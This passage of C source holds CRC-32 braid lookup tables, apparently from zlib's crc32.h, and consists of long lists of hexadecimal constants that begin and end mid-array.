0x52233d4b, 0xb0ff2632, 0x5f3d4d0c, 0xb40af60f, 0x5bc89d31, 0xaac3c6bc, 0x4501ad82, 0xae361681, 0x41f47dbf, 0xa32866c6, 0x4cea0df8, 0xa7ddb6fb, 0x481fddc5, 0xd1e70470, 0x3e256f4e, 0xd512d44d, 0x3ad0bf73, 0xd80ca40a, 0x37cecf34, 0xdcf97437, 0x333b1f09, 0xc2304484, 0x2df22fba, 0xc6c594b9, 0x2907ff87, 0xcbdbe4fe, 0x24198fc0, 0xcf2e34c3, 0x20ec5ffd, 0xf6498598, 0x198beea6, 0xf2bc55a5, 0x1d7e3e9b, 0xffa225e2, 0x10604edc, 0xfb57f5df, 0x14959ee1, 0xe59ec56c, 0x0a5cae52, 0xe16b1551, 0x0ea97e6f, 0xec756516, 0x03b70e28, 0xe880b52b, 0x0742de15, 0xe6050901, 0x09c7623f, 0xe2f0d93c, 0x0d32b202, 0xefeea97b, 0x002cc245, 0xeb1b7946, 0x04d91278, 0xf5d249f5, 0x1a1022cb, 0xf12799c8, 0x1ee5f2f6, 0xfc39e98f, 0x13fb82b1, 0xf8cc39b2, 0x170e528c, 0xc1ab88e9, 0x2e69e3d7, 0xc55e58d4, 0x2a9c33ea, 0xc8402893, 0x278243ad, 0xccb5f8ae, 0x23779390, 0xd27cc81d, 0x3dbea323, 0xd6891820, 0x394b731e, 0xdb976867, 0x34550359, 0xdf62b85a, 0x30a0d364, 0xa9580ad1, 0x469a61ef, 0xadaddaec, 0x426fb1d2, 0xa0b3aaab, 0x4f71c195, 0xa4467a96, 0x4b8411a8, 0xba8f4a25, 0x554d211b, 0xbe7a9a18, 0x51b8f126, 0xb364ea5f, 0x5ca68161, 0xb7913a62, 0x5853515c, 0x8ef68b39, 0x6134e007, 0x8a035b04, 0x65c1303a, 0x871d2b43, 0x68df407d, 0x83e8fb7e, 0x6c2a9040, 0x9d21cbcd, 0x72e3a0f3, 0x99d41bf0, 0x761670ce, 0x94ca6bb7, 0x7b080089, 0x903fbb8a, 0x7ffdd0b4, 0x78bf0ea1, 0x977d659f, 0x7c4ade9c, 0x9388b5a2, 0x7154aedb, 0x9e96c5e5, 0x75a17ee6, 0x9a6315d8, 0x6b684e55, 0x84aa256b, 0x6f9d9e68, 0x805ff556, 0x6283ee2f, 0x8d418511, 0x66763e12, 0x89b4552c, 0x5f118f49, 0xb0d3e477, 0x5be45f74, 0xb426344a, 0x56fa2f33, 0xb938440d, 0x520fff0e, 0xbdcd9430, 0x4cc6cfbd, 0xa304a483, 0x48331f80, 0xa7f174be, 0x452d6fc7, 0xaaef04f9, 0x41d8bffa, 0xae1ad4c4, 0x37e20d71, 0xd820664f, 0x3317dd4c, 0xdcd5b672, 0x3e09ad0b, 0xd1cbc635, 0x3afc7d36, 0xd53e1608, 0x24354d85, 0xcbf726bb, 0x20c09db8, 0xcf02f686, 0x2ddeedff, 0xc21c86c1, 0x292b3dc2, 0xc6e956fc, 0x104c8c99, 0xff8ee7a7, 0x14b95ca4, 0xfb7b379a, 0x19a72ce3, 0xf66547dd, 0x1d52fcde, 0xf29097e0, 0x039bcc6d, 
0xec59a753, 0x076e1c50, 0xe8ac776e, 0x0a706c17, 0xe5b20729, 0x0e85bc2a, 0xe147d714}, {0x00000000, 0x177b1443, 0x2ef62886, 0x398d3cc5, 0x5dec510c, 0x4a97454f, 0x731a798a, 0x64616dc9, 0xbbd8a218, 0xaca3b65b, 0x952e8a9e, 0x82559edd, 0xe634f314, 0xf14fe757, 0xc8c2db92, 0xdfb9cfd1, 0xacc04271, 0xbbbb5632, 0x82366af7, 0x954d7eb4, 0xf12c137d, 0xe657073e, 0xdfda3bfb, 0xc8a12fb8, 0x1718e069, 0x0063f42a, 0x39eec8ef, 0x2e95dcac, 0x4af4b165, 0x5d8fa526, 0x640299e3, 0x73798da0, 0x82f182a3, 0x958a96e0, 0xac07aa25, 0xbb7cbe66, 0xdf1dd3af, 0xc866c7ec, 0xf1ebfb29, 0xe690ef6a, 0x392920bb, 0x2e5234f8, 0x17df083d, 0x00a41c7e, 0x64c571b7, 0x73be65f4, 0x4a335931, 0x5d484d72, 0x2e31c0d2, 0x394ad491, 0x00c7e854, 0x17bcfc17, 0x73dd91de, 0x64a6859d, 0x5d2bb958, 0x4a50ad1b, 0x95e962ca, 0x82927689, 0xbb1f4a4c, 0xac645e0f, 0xc80533c6, 0xdf7e2785, 0xe6f31b40, 0xf1880f03, 0xde920307, 0xc9e91744, 0xf0642b81, 0xe71f3fc2, 0x837e520b, 0x94054648, 0xad887a8d, 0xbaf36ece, 0x654aa11f, 0x7231b55c, 0x4bbc8999, 0x5cc79dda, 0x38a6f013, 0x2fdde450, 0x1650d895, 0x012bccd6, 0x72524176, 0x65295535, 0x5ca469f0, 0x4bdf7db3, 0x2fbe107a, 0x38c50439, 0x014838fc, 0x16332cbf, 0xc98ae36e, 0xdef1f72d, 0xe77ccbe8, 0xf007dfab, 0x9466b262, 0x831da621, 0xba909ae4, 0xadeb8ea7, 0x5c6381a4, 0x4b1895e7, 0x7295a922, 0x65eebd61, 0x018fd0a8, 0x16f4c4eb, 0x2f79f82e, 0x3802ec6d, 0xe7bb23bc, 0xf0c037ff, 0xc94d0b3a, 0xde361f79, 0xba5772b0, 0xad2c66f3, 0x94a15a36, 0x83da4e75, 0xf0a3c3d5, 0xe7d8d796, 0xde55eb53, 0xc92eff10, 0xad4f92d9, 0xba34869a, 0x83b9ba5f, 0x94c2ae1c, 0x4b7b61cd, 0x5c00758e, 0x658d494b, 0x72f65d08, 0x169730c1, 0x01ec2482, 0x38611847, 0x2f1a0c04, 0x6655004f, 0x712e140c, 0x48a328c9, 0x5fd83c8a, 0x3bb95143, 0x2cc24500, 0x154f79c5, 0x02346d86, 0xdd8da257, 0xcaf6b614, 0xf37b8ad1, 0xe4009e92, 0x8061f35b, 0x971ae718, 0xae97dbdd, 0xb9eccf9e, 0xca95423e, 0xddee567d, 0xe4636ab8, 0xf3187efb, 0x97791332, 0x80020771, 0xb98f3bb4, 0xaef42ff7, 0x714de026, 0x6636f465, 0x5fbbc8a0, 0x48c0dce3, 0x2ca1b12a, 0x3bdaa569, 0x025799ac, 
0x152c8def, 0xe4a482ec, 0xf3df96af, 0xca52aa6a, 0xdd29be29, 0xb948d3e0, 0xae33c7a3, 0x97befb66, 0x80c5ef25, 0x5f7c20f4, 0x480734b7, 0x718a0872, 0x66f11c31, 0x029071f8, 0x15eb65bb, 0x2c66597e, 0x3b1d4d3d, 0x4864c09d, 0x5f1fd4de, 0x6692e81b, 0x71e9fc58, 0x15889191, 0x02f385d2, 0x3b7eb917, 0x2c05ad54, 0xf3bc6285, 0xe4c776c6, 0xdd4a4a03, 0xca315e40, 0xae503389, 0xb92b27ca, 0x80a61b0f, 0x97dd0f4c, 0xb8c70348, 0xafbc170b, 0x96312bce, 0x814a3f8d, 0xe52b5244, 0xf2504607, 0xcbdd7ac2, 0xdca66e81, 0x031fa150, 0x1464b513, 0x2de989d6, 0x3a929d95, 0x5ef3f05c, 0x4988e41f, 0x7005d8da, 0x677ecc99, 0x14074139, 0x037c557a, 0x3af169bf, 0x2d8a7dfc, 0x49eb1035, 0x5e900476, 0x671d38b3, 0x70662cf0, 0xafdfe321, 0xb8a4f762, 0x8129cba7, 0x9652dfe4, 0xf233b22d, 0xe548a66e, 0xdcc59aab, 0xcbbe8ee8, 0x3a3681eb, 0x2d4d95a8, 0x14c0a96d, 0x03bbbd2e, 0x67dad0e7, 0x70a1c4a4, 0x492cf861, 0x5e57ec22, 0x81ee23f3, 0x969537b0, 0xaf180b75, 0xb8631f36, 0xdc0272ff, 0xcb7966bc, 0xf2f45a79, 0xe58f4e3a, 0x96f6c39a, 0x818dd7d9, 0xb800eb1c, 0xaf7bff5f, 0xcb1a9296, 0xdc6186d5, 0xe5ecba10, 0xf297ae53, 0x2d2e6182, 0x3a5575c1, 0x03d84904, 0x14a35d47, 0x70c2308e, 0x67b924cd, 0x5e341808, 0x494f0c4b}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x0000000000000000, 0x43147b1700000000, 0x8628f62e00000000, 0xc53c8d3900000000, 0x0c51ec5d00000000, 0x4f45974a00000000, 0x8a791a7300000000, 0xc96d616400000000, 0x18a2d8bb00000000, 0x5bb6a3ac00000000, 0x9e8a2e9500000000, 0xdd9e558200000000, 0x14f334e600000000, 0x57e74ff100000000, 0x92dbc2c800000000, 0xd1cfb9df00000000, 0x7142c0ac00000000, 0x3256bbbb00000000, 0xf76a368200000000, 0xb47e4d9500000000, 0x7d132cf100000000, 0x3e0757e600000000, 0xfb3bdadf00000000, 0xb82fa1c800000000, 0x69e0181700000000, 0x2af4630000000000, 0xefc8ee3900000000, 0xacdc952e00000000, 0x65b1f44a00000000, 0x26a58f5d00000000, 0xe399026400000000, 0xa08d797300000000, 0xa382f18200000000, 0xe0968a9500000000, 0x25aa07ac00000000, 0x66be7cbb00000000, 0xafd31ddf00000000, 0xecc766c800000000, 
0x29fbebf100000000, 0x6aef90e600000000, 0xbb20293900000000, 0xf834522e00000000, 0x3d08df1700000000, 0x7e1ca40000000000, 0xb771c56400000000, 0xf465be7300000000, 0x3159334a00000000, 0x724d485d00000000, 0xd2c0312e00000000, 0x91d44a3900000000, 0x54e8c70000000000, 0x17fcbc1700000000, 0xde91dd7300000000, 0x9d85a66400000000, 0x58b92b5d00000000, 0x1bad504a00000000, 0xca62e99500000000, 0x8976928200000000, 0x4c4a1fbb00000000, 0x0f5e64ac00000000, 0xc63305c800000000, 0x85277edf00000000, 0x401bf3e600000000, 0x030f88f100000000, 0x070392de00000000, 0x4417e9c900000000, 0x812b64f000000000, 0xc23f1fe700000000, 0x0b527e8300000000, 0x4846059400000000, 0x8d7a88ad00000000, 0xce6ef3ba00000000, 0x1fa14a6500000000, 0x5cb5317200000000, 0x9989bc4b00000000, 0xda9dc75c00000000, 0x13f0a63800000000, 0x50e4dd2f00000000, 0x95d8501600000000, 0xd6cc2b0100000000, 0x7641527200000000, 0x3555296500000000, 0xf069a45c00000000, 0xb37ddf4b00000000, 0x7a10be2f00000000, 0x3904c53800000000, 0xfc38480100000000, 0xbf2c331600000000, 0x6ee38ac900000000, 0x2df7f1de00000000, 0xe8cb7ce700000000, 0xabdf07f000000000, 0x62b2669400000000, 0x21a61d8300000000, 0xe49a90ba00000000, 0xa78eebad00000000, 0xa481635c00000000, 0xe795184b00000000, 0x22a9957200000000, 0x61bdee6500000000, 0xa8d08f0100000000, 0xebc4f41600000000, 0x2ef8792f00000000, 0x6dec023800000000, 0xbc23bbe700000000, 0xff37c0f000000000, 0x3a0b4dc900000000, 0x791f36de00000000, 0xb07257ba00000000, 0xf3662cad00000000, 0x365aa19400000000, 0x754eda8300000000, 0xd5c3a3f000000000, 0x96d7d8e700000000, 0x53eb55de00000000, 0x10ff2ec900000000, 0xd9924fad00000000, 0x9a8634ba00000000, 0x5fbab98300000000, 0x1caec29400000000, 0xcd617b4b00000000, 0x8e75005c00000000, 0x4b498d6500000000, 0x085df67200000000, 0xc130971600000000, 0x8224ec0100000000, 0x4718613800000000, 0x040c1a2f00000000, 0x4f00556600000000, 0x0c142e7100000000, 0xc928a34800000000, 0x8a3cd85f00000000, 0x4351b93b00000000, 0x0045c22c00000000, 0xc5794f1500000000, 0x866d340200000000, 0x57a28ddd00000000, 0x14b6f6ca00000000, 
0xd18a7bf300000000, 0x929e00e400000000, 0x5bf3618000000000, 0x18e71a9700000000, 0xdddb97ae00000000, 0x9ecfecb900000000, 0x3e4295ca00000000, 0x7d56eedd00000000, 0xb86a63e400000000, 0xfb7e18f300000000, 0x3213799700000000, 0x7107028000000000, 0xb43b8fb900000000, 0xf72ff4ae00000000, 0x26e04d7100000000, 0x65f4366600000000, 0xa0c8bb5f00000000, 0xe3dcc04800000000, 0x2ab1a12c00000000, 0x69a5da3b00000000, 0xac99570200000000, 0xef8d2c1500000000, 0xec82a4e400000000, 0xaf96dff300000000, 0x6aaa52ca00000000, 0x29be29dd00000000, 0xe0d348b900000000, 0xa3c733ae00000000, 0x66fbbe9700000000, 0x25efc58000000000, 0xf4207c5f00000000, 0xb734074800000000, 0x72088a7100000000, 0x311cf16600000000, 0xf871900200000000, 0xbb65eb1500000000, 0x7e59662c00000000, 0x3d4d1d3b00000000, 0x9dc0644800000000, 0xded41f5f00000000, 0x1be8926600000000, 0x58fce97100000000, 0x9191881500000000, 0xd285f30200000000, 0x17b97e3b00000000, 0x54ad052c00000000, 0x8562bcf300000000, 0xc676c7e400000000, 0x034a4add00000000, 0x405e31ca00000000, 0x893350ae00000000, 0xca272bb900000000, 0x0f1ba68000000000, 0x4c0fdd9700000000, 0x4803c7b800000000, 0x0b17bcaf00000000, 0xce2b319600000000, 0x8d3f4a8100000000, 0x44522be500000000, 0x074650f200000000, 0xc27addcb00000000, 0x816ea6dc00000000, 0x50a11f0300000000, 0x13b5641400000000, 0xd689e92d00000000, 0x959d923a00000000, 0x5cf0f35e00000000, 0x1fe4884900000000, 0xdad8057000000000, 0x99cc7e6700000000, 0x3941071400000000, 0x7a557c0300000000, 0xbf69f13a00000000, 0xfc7d8a2d00000000, 0x3510eb4900000000, 0x7604905e00000000, 0xb3381d6700000000, 0xf02c667000000000, 0x21e3dfaf00000000, 0x62f7a4b800000000, 0xa7cb298100000000, 0xe4df529600000000, 0x2db233f200000000, 0x6ea648e500000000, 0xab9ac5dc00000000, 0xe88ebecb00000000, 0xeb81363a00000000, 0xa8954d2d00000000, 0x6da9c01400000000, 0x2ebdbb0300000000, 0xe7d0da6700000000, 0xa4c4a17000000000, 0x61f82c4900000000, 0x22ec575e00000000, 0xf323ee8100000000, 0xb037959600000000, 0x750b18af00000000, 0x361f63b800000000, 0xff7202dc00000000, 0xbc6679cb00000000, 
0x795af4f200000000, 0x3a4e8fe500000000, 0x9ac3f69600000000, 0xd9d78d8100000000, 0x1ceb00b800000000, 0x5fff7baf00000000, 0x96921acb00000000, 0xd58661dc00000000, 0x10baece500000000, 0x53ae97f200000000, 0x82612e2d00000000, 0xc175553a00000000, 0x0449d80300000000, 0x475da31400000000, 0x8e30c27000000000, 0xcd24b96700000000, 0x0818345e00000000, 0x4b0c4f4900000000}, {0x0000000000000000, 0x3e6bc2ef00000000, 0x3dd0f50400000000, 0x03bb37eb00000000, 0x7aa0eb0900000000, 0x44cb29e600000000, 0x47701e0d00000000, 0x791bdce200000000, 0xf440d71300000000, 0xca2b15fc00000000, 0xc990221700000000, 0xf7fbe0f800000000, 0x8ee03c1a00000000, 0xb08bfef500000000, 0xb330c91e00000000, 0x8d5b0bf100000000, 0xe881ae2700000000, 0xd6ea6cc800000000, 0xd5515b2300000000, 0xeb3a99cc00000000, 0x9221452e00000000, 0xac4a87c100000000, 0xaff1b02a00000000, 0x919a72c500000000, 0x1cc1793400000000, 0x22aabbdb00000000, 0x21118c3000000000, 0x1f7a4edf00000000, 0x6661923d00000000, 0x580a50d200000000, 0x5bb1673900000000, 0x65daa5d600000000, 0xd0035d4f00000000, 0xee689fa000000000, 0xedd3a84b00000000, 0xd3b86aa400000000, 0xaaa3b64600000000, 0x94c874a900000000, 0x9773434200000000, 0xa91881ad00000000, 0x24438a5c00000000, 0x1a2848b300000000, 0x19937f5800000000, 0x27f8bdb700000000, 0x5ee3615500000000, 0x6088a3ba00000000, 0x6333945100000000, 0x5d5856be00000000, 0x3882f36800000000, 0x06e9318700000000, 0x0552066c00000000, 0x3b39c48300000000, 0x4222186100000000, 0x7c49da8e00000000, 0x7ff2ed6500000000, 0x41992f8a00000000, 0xccc2247b00000000, 0xf2a9e69400000000, 0xf112d17f00000000, 0xcf79139000000000, 0xb662cf7200000000, 0x88090d9d00000000, 0x8bb23a7600000000, 0xb5d9f89900000000, 0xa007ba9e00000000, 0x9e6c787100000000, 0x9dd74f9a00000000, 0xa3bc8d7500000000, 0xdaa7519700000000, 0xe4cc937800000000, 0xe777a49300000000, 0xd91c667c00000000, 0x54476d8d00000000, 0x6a2caf6200000000, 0x6997988900000000, 0x57fc5a6600000000, 0x2ee7868400000000, 0x108c446b00000000, 0x1337738000000000, 0x2d5cb16f00000000, 0x488614b900000000, 
0x76edd65600000000, 0x7556e1bd00000000, 0x4b3d235200000000, 0x3226ffb000000000, 0x0c4d3d5f00000000, 0x0ff60ab400000000, 0x319dc85b00000000, 0xbcc6c3aa00000000, 0x82ad014500000000, 0x811636ae00000000, 0xbf7df44100000000, 0xc66628a300000000, 0xf80dea4c00000000, 0xfbb6dda700000000, 0xc5dd1f4800000000, 0x7004e7d100000000, 0x4e6f253e00000000, 0x4dd412d500000000, 0x73bfd03a00000000, 0x0aa40cd800000000, 0x34cfce3700000000, 0x3774f9dc00000000, 0x091f3b3300000000, 0x844430c200000000, 0xba2ff22d00000000, 0xb994c5c600000000, 0x87ff072900000000, 0xfee4dbcb00000000, 0xc08f192400000000, 0xc3342ecf00000000, 0xfd5fec2000000000, 0x988549f600000000, 0xa6ee8b1900000000, 0xa555bcf200000000, 0x9b3e7e1d00000000, 0xe225a2ff00000000, 0xdc4e601000000000, 0xdff557fb00000000, 0xe19e951400000000, 0x6cc59ee500000000, 0x52ae5c0a00000000, 0x51156be100000000, 0x6f7ea90e00000000, 0x166575ec00000000, 0x280eb70300000000, 0x2bb580e800000000, 0x15de420700000000, 0x010905e600000000, 0x3f62c70900000000, 0x3cd9f0e200000000, 0x02b2320d00000000, 0x7ba9eeef00000000, 0x45c22c0000000000, 0x46791beb00000000, 0x7812d90400000000, 0xf549d2f500000000, 0xcb22101a00000000, 0xc89927f100000000, 0xf6f2e51e00000000, 0x8fe939fc00000000, 0xb182fb1300000000, 0xb239ccf800000000, 0x8c520e1700000000, 0xe988abc100000000, 0xd7e3692e00000000, 0xd4585ec500000000, 0xea339c2a00000000, 0x932840c800000000, 0xad43822700000000, 0xaef8b5cc00000000, 0x9093772300000000, 0x1dc87cd200000000, 0x23a3be3d00000000, 0x201889d600000000, 0x1e734b3900000000, 0x676897db00000000, 0x5903553400000000, 0x5ab862df00000000, 0x64d3a03000000000, 0xd10a58a900000000, 0xef619a4600000000, 0xecdaadad00000000, 0xd2b16f4200000000, 0xabaab3a000000000, 0x95c1714f00000000, 0x967a46a400000000, 0xa811844b00000000, 0x254a8fba00000000, 0x1b214d5500000000, 0x189a7abe00000000, 0x26f1b85100000000, 0x5fea64b300000000, 0x6181a65c00000000, 0x623a91b700000000, 0x5c51535800000000, 0x398bf68e00000000, 0x07e0346100000000, 0x045b038a00000000, 0x3a30c16500000000, 0x432b1d8700000000, 
0x7d40df6800000000, 0x7efbe88300000000, 0x40902a6c00000000, 0xcdcb219d00000000, 0xf3a0e37200000000, 0xf01bd49900000000, 0xce70167600000000, 0xb76bca9400000000, 0x8900087b00000000, 0x8abb3f9000000000, 0xb4d0fd7f00000000, 0xa10ebf7800000000, 0x9f657d9700000000, 0x9cde4a7c00000000, 0xa2b5889300000000, 0xdbae547100000000, 0xe5c5969e00000000, 0xe67ea17500000000, 0xd815639a00000000, 0x554e686b00000000, 0x6b25aa8400000000, 0x689e9d6f00000000, 0x56f55f8000000000, 0x2fee836200000000, 0x1185418d00000000, 0x123e766600000000, 0x2c55b48900000000, 0x498f115f00000000, 0x77e4d3b000000000, 0x745fe45b00000000, 0x4a3426b400000000, 0x332ffa5600000000, 0x0d4438b900000000, 0x0eff0f5200000000, 0x3094cdbd00000000, 0xbdcfc64c00000000, 0x83a404a300000000, 0x801f334800000000, 0xbe74f1a700000000, 0xc76f2d4500000000, 0xf904efaa00000000, 0xfabfd84100000000, 0xc4d41aae00000000, 0x710de23700000000, 0x4f6620d800000000, 0x4cdd173300000000, 0x72b6d5dc00000000, 0x0bad093e00000000, 0x35c6cbd100000000, 0x367dfc3a00000000, 0x08163ed500000000, 0x854d352400000000, 0xbb26f7cb00000000, 0xb89dc02000000000, 0x86f602cf00000000, 0xffedde2d00000000, 0xc1861cc200000000, 0xc23d2b2900000000, 0xfc56e9c600000000, 0x998c4c1000000000, 0xa7e78eff00000000, 0xa45cb91400000000, 0x9a377bfb00000000, 0xe32ca71900000000, 0xdd4765f600000000, 0xdefc521d00000000, 0xe09790f200000000, 0x6dcc9b0300000000, 0x53a759ec00000000, 0x501c6e0700000000, 0x6e77ace800000000, 0x176c700a00000000, 0x2907b2e500000000, 0x2abc850e00000000, 0x14d747e100000000}, {0x0000000000000000, 0xc0df8ec100000000, 0xc1b96c5800000000, 0x0166e29900000000, 0x8273d9b000000000, 0x42ac577100000000, 0x43cab5e800000000, 0x83153b2900000000, 0x45e1c3ba00000000, 0x853e4d7b00000000, 0x8458afe200000000, 0x4487212300000000, 0xc7921a0a00000000, 0x074d94cb00000000, 0x062b765200000000, 0xc6f4f89300000000, 0xcbc4f6ae00000000, 0x0b1b786f00000000, 0x0a7d9af600000000, 0xcaa2143700000000, 0x49b72f1e00000000, 0x8968a1df00000000, 0x880e434600000000, 0x48d1cd8700000000, 
0x8e25351400000000, 0x4efabbd500000000, 0x4f9c594c00000000, 0x8f43d78d00000000, 0x0c56eca400000000, 0xcc89626500000000, 0xcdef80fc00000000, 0x0d300e3d00000000, 0xd78f9c8600000000, 0x1750124700000000, 0x1636f0de00000000, 0xd6e97e1f00000000, 0x55fc453600000000, 0x9523cbf700000000, 0x9445296e00000000, 0x549aa7af00000000, 0x926e5f3c00000000, 0x52b1d1fd00000000, 0x53d7336400000000, 0x9308bda500000000, 0x101d868c00000000, 0xd0c2084d00000000, 0xd1a4ead400000000, 0x117b641500000000, 0x1c4b6a2800000000, 0xdc94e4e900000000, 0xddf2067000000000, 0x1d2d88b100000000, 0x9e38b39800000000, 0x5ee73d5900000000, 0x5f81dfc000000000, 0x9f5e510100000000, 0x59aaa99200000000, 0x9975275300000000, 0x9813c5ca00000000, 0x58cc4b0b00000000, 0xdbd9702200000000, 0x1b06fee300000000, 0x1a601c7a00000000, 0xdabf92bb00000000, 0xef1948d600000000, 0x2fc6c61700000000, 0x2ea0248e00000000, 0xee7faa4f00000000, 0x6d6a916600000000, 0xadb51fa700000000, 0xacd3fd3e00000000, 0x6c0c73ff00000000, 0xaaf88b6c00000000, 0x6a2705ad00000000, 0x6b41e73400000000, 0xab9e69f500000000, 0x288b52dc00000000, 0xe854dc1d00000000, 0xe9323e8400000000, 0x29edb04500000000, 0x24ddbe7800000000, 0xe40230b900000000, 0xe564d22000000000, 0x25bb5ce100000000, 0xa6ae67c800000000, 0x6671e90900000000, 0x67170b9000000000, 0xa7c8855100000000, 0x613c7dc200000000, 0xa1e3f30300000000, 0xa085119a00000000, 0x605a9f5b00000000, 0xe34fa47200000000, 0x23902ab300000000, 0x22f6c82a00000000, 0xe22946eb00000000, 0x3896d45000000000, 0xf8495a9100000000, 0xf92fb80800000000, 0x39f036c900000000, 0xbae50de000000000, 0x7a3a832100000000, 0x7b5c61b800000000, 0xbb83ef7900000000, 0x7d7717ea00000000, 0xbda8992b00000000, 0xbcce7bb200000000, 0x7c11f57300000000, 0xff04ce5a00000000, 0x3fdb409b00000000, 0x3ebda20200000000, 0xfe622cc300000000, 0xf35222fe00000000, 0x338dac3f00000000, 0x32eb4ea600000000, 0xf234c06700000000, 0x7121fb4e00000000, 0xb1fe758f00000000, 0xb098971600000000, 0x704719d700000000, 0xb6b3e14400000000, 0x766c6f8500000000, 0x770a8d1c00000000, 0xb7d503dd00000000, 
0x34c038f400000000, 0xf41fb63500000000, 0xf57954ac00000000, 0x35a6da6d00000000, 0x9f35e17700000000, 0x5fea6fb600000000, 0x5e8c8d2f00000000, 0x9e5303ee00000000, 0x1d4638c700000000, 0xdd99b60600000000, 0xdcff549f00000000, 0x1c20da5e00000000, 0xdad422cd00000000, 0x1a0bac0c00000000, 0x1b6d4e9500000000, 0xdbb2c05400000000, 0x58a7fb7d00000000, 0x987875bc00000000, 0x991e972500000000, 0x59c119e400000000, 0x54f117d900000000, 0x942e991800000000, 0x95487b8100000000, 0x5597f54000000000, 0xd682ce6900000000, 0x165d40a800000000, 0x173ba23100000000, 0xd7e42cf000000000, 0x1110d46300000000, 0xd1cf5aa200000000, 0xd0a9b83b00000000, 0x107636fa00000000, 0x93630dd300000000, 0x53bc831200000000, 0x52da618b00000000, 0x9205ef4a00000000, 0x48ba7df100000000, 0x8865f33000000000, 0x890311a900000000, 0x49dc9f6800000000, 0xcac9a44100000000, 0x0a162a8000000000, 0x0b70c81900000000, 0xcbaf46d800000000, 0x0d5bbe4b00000000, 0xcd84308a00000000, 0xcce2d21300000000, 0x0c3d5cd200000000, 0x8f2867fb00000000, 0x4ff7e93a00000000, 0x4e910ba300000000, 0x8e4e856200000000, 0x837e8b5f00000000, 0x43a1059e00000000, 0x42c7e70700000000, 0x821869c600000000, 0x010d52ef00000000, 0xc1d2dc2e00000000, 0xc0b43eb700000000, 0x006bb07600000000, 0xc69f48e500000000, 0x0640c62400000000, 0x072624bd00000000, 0xc7f9aa7c00000000, 0x44ec915500000000, 0x84331f9400000000, 0x8555fd0d00000000, 0x458a73cc00000000, 0x702ca9a100000000, 0xb0f3276000000000, 0xb195c5f900000000, 0x714a4b3800000000, 0xf25f701100000000, 0x3280fed000000000, 0x33e61c4900000000, 0xf339928800000000, 0x35cd6a1b00000000, 0xf512e4da00000000, 0xf474064300000000, 0x34ab888200000000, 0xb7beb3ab00000000, 0x77613d6a00000000, 0x7607dff300000000, 0xb6d8513200000000, 0xbbe85f0f00000000, 0x7b37d1ce00000000, 0x7a51335700000000, 0xba8ebd9600000000, 0x399b86bf00000000, 0xf944087e00000000, 0xf822eae700000000, 0x38fd642600000000, 0xfe099cb500000000, 0x3ed6127400000000, 0x3fb0f0ed00000000, 0xff6f7e2c00000000, 0x7c7a450500000000, 0xbca5cbc400000000, 0xbdc3295d00000000, 0x7d1ca79c00000000, 
0xa7a3352700000000, 0x677cbbe600000000, 0x661a597f00000000, 0xa6c5d7be00000000, 0x25d0ec9700000000, 0xe50f625600000000, 0xe46980cf00000000, 0x24b60e0e00000000, 0xe242f69d00000000, 0x229d785c00000000, 0x23fb9ac500000000, 0xe324140400000000, 0x60312f2d00000000, 0xa0eea1ec00000000, 0xa188437500000000, 0x6157cdb400000000, 0x6c67c38900000000, 0xacb84d4800000000, 0xaddeafd100000000, 0x6d01211000000000, 0xee141a3900000000, 0x2ecb94f800000000, 0x2fad766100000000, 0xef72f8a000000000, 0x2986003300000000, 0xe9598ef200000000, 0xe83f6c6b00000000, 0x28e0e2aa00000000, 0xabf5d98300000000, 0x6b2a574200000000, 0x6a4cb5db00000000, 0xaa933b1a00000000}, {0x0000000000000000, 0x6f4ca59b00000000, 0x9f9e3bec00000000, 0xf0d29e7700000000, 0x7f3b060300000000, 0x1077a39800000000, 0xe0a53def00000000, 0x8fe9987400000000, 0xfe760c0600000000, 0x913aa99d00000000, 0x61e837ea00000000, 0x0ea4927100000000, 0x814d0a0500000000, 0xee01af9e00000000, 0x1ed331e900000000, 0x719f947200000000, 0xfced180c00000000, 0x93a1bd9700000000, 0x637323e000000000, 0x0c3f867b00000000, 0x83d61e0f00000000, 0xec9abb9400000000, 0x1c4825e300000000, 0x7304807800000000, 0x029b140a00000000, 0x6dd7b19100000000, 0x9d052fe600000000, 0xf2498a7d00000000, 0x7da0120900000000, 0x12ecb79200000000, 0xe23e29e500000000, 0x8d728c7e00000000, 0xf8db311800000000, 0x9797948300000000, 0x67450af400000000, 0x0809af6f00000000, 0x87e0371b00000000, 0xe8ac928000000000, 0x187e0cf700000000, 0x7732a96c00000000, 0x06ad3d1e00000000, 0x69e1988500000000, 0x993306f200000000, 0xf67fa36900000000, 0x79963b1d00000000, 0x16da9e8600000000, 0xe60800f100000000, 0x8944a56a00000000, 0x0436291400000000, 0x6b7a8c8f00000000, 0x9ba812f800000000, 0xf4e4b76300000000, 0x7b0d2f1700000000, 0x14418a8c00000000, 0xe49314fb00000000, 0x8bdfb16000000000, 0xfa40251200000000, 0x950c808900000000, 0x65de1efe00000000, 0x0a92bb6500000000, 0x857b231100000000, 0xea37868a00000000, 0x1ae518fd00000000, 0x75a9bd6600000000, 0xf0b7633000000000, 0x9ffbc6ab00000000, 0x6f2958dc00000000, 
0x0065fd4700000000, 0x8f8c653300000000, 0xe0c0c0a800000000, 0x10125edf00000000, 0x7f5efb4400000000, 0x0ec16f3600000000, 0x618dcaad00000000, 0x915f54da00000000, 0xfe13f14100000000, 0x71fa693500000000, 0x1eb6ccae00000000, 0xee6452d900000000, 0x8128f74200000000, 0x0c5a7b3c00000000, 0x6316dea700000000, 0x93c440d000000000, 0xfc88e54b00000000, 0x73617d3f00000000, 0x1c2dd8a400000000, 0xecff46d300000000, 0x83b3e34800000000, 0xf22c773a00000000, 0x9d60d2a100000000, 0x6db24cd600000000, 0x02fee94d00000000, 0x8d17713900000000, 0xe25bd4a200000000, 0x12894ad500000000, 0x7dc5ef4e00000000, 0x086c522800000000, 0x6720f7b300000000, 0x97f269c400000000, 0xf8becc5f00000000, 0x7757542b00000000, 0x181bf1b000000000, 0xe8c96fc700000000, 0x8785ca5c00000000, 0xf61a5e2e00000000, 0x9956fbb500000000, 0x698465c200000000, 0x06c8c05900000000, 0x8921582d00000000, 0xe66dfdb600000000, 0x16bf63c100000000, 0x79f3c65a00000000, 0xf4814a2400000000, 0x9bcdefbf00000000, 0x6b1f71c800000000, 0x0453d45300000000, 0x8bba4c2700000000, 0xe4f6e9bc00000000, 0x142477cb00000000, 0x7b68d25000000000, 0x0af7462200000000, 0x65bbe3b900000000, 0x95697dce00000000, 0xfa25d85500000000, 0x75cc402100000000, 0x1a80e5ba00000000, 0xea527bcd00000000, 0x851ede5600000000, 0xe06fc76000000000, 0x8f2362fb00000000, 0x7ff1fc8c00000000, 0x10bd591700000000, 0x9f54c16300000000, 